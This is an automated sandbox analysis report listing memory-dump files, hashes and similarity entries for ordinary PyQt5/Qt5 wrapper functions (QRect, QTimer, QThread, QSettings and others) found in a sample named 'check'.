                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_
                                                                                                                                                                                                                • String ID: QRect$width$width(self) -> int
                                                                                                                                                                                                                • API String ID: 2938811853-473855772
                                                                                                                                                                                                                • Opcode ID: bb9ef135c8fb4e04b1fa89cde01f1ce9e12326fa4d709a23f22574534f462ea2
                                                                                                                                                                                                                • Instruction ID: 2a0af3036ec1aef686bb5733b7429bfdf3637b583b415f4db926022f926d19f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb9ef135c8fb4e04b1fa89cde01f1ce9e12326fa4d709a23f22574534f462ea2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D011AB6B05A86C1DB00DF65E88CAA833A4FB44B84F994036CA5D13720DF7DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?endAbstractColumns@ItemModel@@Move
                                                                                                                                                                                                                • String ID: QStringListModel$endMoveColumns$endMoveColumns(self)
                                                                                                                                                                                                                • API String ID: 2131576783-555918441
                                                                                                                                                                                                                • Opcode ID: ebb6eac75834aa56db29ac0e5e9ff5282b363ef8593e39cd4b09bffea6cb20e5
                                                                                                                                                                                                                • Instruction ID: 0bb022b80a11b1d8d83813284a2931e4bbefa209b56961350d8a2c9487a7a34c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebb6eac75834aa56db29ac0e5e9ff5282b363ef8593e39cd4b09bffea6cb20e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A01E9B5A05A4691EB009F65E888BA933B4FB44B84F954032C94D53330EFBDD55AC780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?endAbstractColumns@InsertItemModel@@
                                                                                                                                                                                                                • String ID: QAbstractTableModel$endInsertColumns$endInsertColumns(self)
                                                                                                                                                                                                                • API String ID: 601490124-2974897469
                                                                                                                                                                                                                • Opcode ID: afaaa949dd641c7468825048b579f42099cdb65faf29a18db9e2e308761e4e7d
                                                                                                                                                                                                                • Instruction ID: d469803c54760d5a9236f4611842383c7976b03623ed6b0d51398d5fa7d77cfa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: afaaa949dd641c7468825048b579f42099cdb65faf29a18db9e2e308761e4e7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC0197B5A05E4681DB009F65E888BA933A4FB44B85F954032CA5D63320DFBDD55AC784
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?startDevice@@Transaction@
                                                                                                                                                                                                                • String ID: QIODevice$startTransaction$startTransaction(self)
                                                                                                                                                                                                                • API String ID: 2630710350-4132997017
                                                                                                                                                                                                                • Opcode ID: a455dd3a9ebec6b90d62dc396db334939d8fe141f4ec036400f75085473a3a00
                                                                                                                                                                                                                • Instruction ID: 2106dd7021323ebd1b0b9aa0aa375d977696ac532d9c945a194a520608f54cbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a455dd3a9ebec6b90d62dc396db334939d8fe141f4ec036400f75085473a3a00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7401E9B5A09E46C1EB009F65E888BA833B4FB44B84F954032CA5D53330DFBDD559C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?endArray@Settings@@
                                                                                                                                                                                                                • String ID: QSettings$endArray$endArray(self)
                                                                                                                                                                                                                • API String ID: 2962122137-1684730492
                                                                                                                                                                                                                • Opcode ID: b1aedf024725a9eb30560e58d86060984a2ef306aa7a79d41519878a18a6c601
                                                                                                                                                                                                                • Instruction ID: d88e8ff2a484aae8270143860138a69f6c86930f5973736d5548d0fdbf9d8a07
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1aedf024725a9eb30560e58d86060984a2ef306aa7a79d41519878a18a6c601
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD01E9B5A09E4A81DB409F65E888BA933B4FB44B84F994032CA5D23324DFBDD559C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: QAbstractTableModel$resetInternalData$resetInternalData(self)
                                                                                                                                                                                                                • API String ID: 1816429982-625756361
                                                                                                                                                                                                                • Opcode ID: 3ef2d1d13eceb85655284aeda99d4bb04c2c5b30b801fcd13621811e4366e3c9
                                                                                                                                                                                                                • Instruction ID: 88cf43da2afde45975f33a82cfba7e14472abee61d9fcaedce59f2b63989eecf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ef2d1d13eceb85655284aeda99d4bb04c2c5b30b801fcd13621811e4366e3c9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C01E5B5A09E86D1EB00DF65E888BA933B4FB44B84F994032CA5D23320DFBDD559C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?stop@Timer@@
                                                                                                                                                                                                                • String ID: QTimer$stop$stop(self)
                                                                                                                                                                                                                • API String ID: 2406205304-1774025808
                                                                                                                                                                                                                • Opcode ID: 543133ad2480e96906d1017abf189d00273b0fc15885c168f4464a22a1ae5c72
                                                                                                                                                                                                                • Instruction ID: aa151a1c42b383640406a69966db660feb3c14c0646d249f9f634bb8057ba7d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 543133ad2480e96906d1017abf189d00273b0fc15885c168f4464a22a1ae5c72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C01E5B5A09A4A81EB40DF65E888BA833A4FB48B94F954032CA4D53330DFBDD55AC784
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?terminate@Thread@@
                                                                                                                                                                                                                • String ID: QThread$terminate$terminate(self)
                                                                                                                                                                                                                • API String ID: 4178474498-243194588
                                                                                                                                                                                                                • Opcode ID: a3897e12adf2a65de8140530ffe662847e502c9ba40cfdcde34b2069ccbec041
                                                                                                                                                                                                                • Instruction ID: 9991aa019fc608b787398cbd3b8a5244de77bc6c59c50ae09c09615b255c28f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3897e12adf2a65de8140530ffe662847e502c9ba40cfdcde34b2069ccbec041
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 540108B5A09F4680DB00DF65E888BA933A4FB44B84F954032CA5D67730DFBDD559C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ??0QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFB02FA83E7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@Bytemalloc
                                                                                                                                                                                                                • String ID: QLibraryInfo$licensee$licensee() -> str
                                                                                                                                                                                                                • API String ID: 244004182-433824442
                                                                                                                                                                                                                • Opcode ID: 9620133fbbd591d3125ca146859e8aa20315744094eb0a5d474bdd297be62e74
                                                                                                                                                                                                                • Instruction ID: 4c47add504d6e5383dc0684e4745c19af92131b122fc47d5fea418aea5c0e22d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9620133fbbd591d3125ca146859e8aa20315744094eb0a5d474bdd297be62e74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE016DA5A09A4781EE809B75E848BB92360FB89B81F981032C54E17761EF3DD409C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?staticInstances@QPluginLoader@@SA?AV?$QList@PEAVQObject@@@@XZ.QT5CORE ref: 00007FFB02F6C447
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
